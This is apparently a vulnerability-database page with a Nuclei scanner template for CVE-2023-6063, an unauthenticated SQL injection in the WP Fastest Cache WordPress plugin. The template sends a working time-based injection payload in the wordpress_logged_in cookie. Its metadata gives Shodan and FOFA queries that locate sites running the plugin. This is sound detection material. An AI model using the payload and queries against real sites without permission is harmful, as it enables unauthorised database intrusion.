Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-6063
HistoryJan 14, 2024 - 1:20 p.m.

WP Fastest Cache 1.2.2 - SQL Injection

2024-01-1413:20:23
ProjectDiscovery
github.com
46
wp-fastest-cache
wordpress-plugin
unauthenticated-sql-injection
cve-2023-6063
wpscan
wordpress

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.03 Low

EPSS

Percentile

91.0%

The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
id: CVE-2023-6063

info:
  name: WP Fastest Cache 1.2.2 - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
  remediation: Fixed in 1.2.2
  reference:
    - https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/
    - https://wordpress.org/plugins/wp-fastest-cache/
    - https://github.com/motikan2010/CVE-2023-6063-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6063
    - https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6063
    cwe-id: CWE-89
    epss-score: 0.02974
    epss-percentile: 0.90865
    cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wpfastestcache
    product: "wp_fastest_cache"
    framework: wordpress
    shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/"
    fofa-query: "body=/wp-content/plugins/wp-fastest-cache/"
    publicwww-query: "/wp-content/plugins/wp-fastest-cache/"
  tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache
flow: |
    if (http(1)) {
        for (let i = 0; i < 2; i++) {
            http(2);
        }}

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "WP Fastest Cache")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(6)))NkcI) AND "tqKU"="tqKU

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "/wp-")'
        condition: and
# digest: 4b0a00483046022100df685a1d55b11e797278a035af7b4589541daf50f23773916305e7782256b763022100a6e038409b46bc92465fb474c672a5df2ee6272d28ac94f68353d1bf0c7960b5:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.03 Low

EPSS

Percentile

91.0%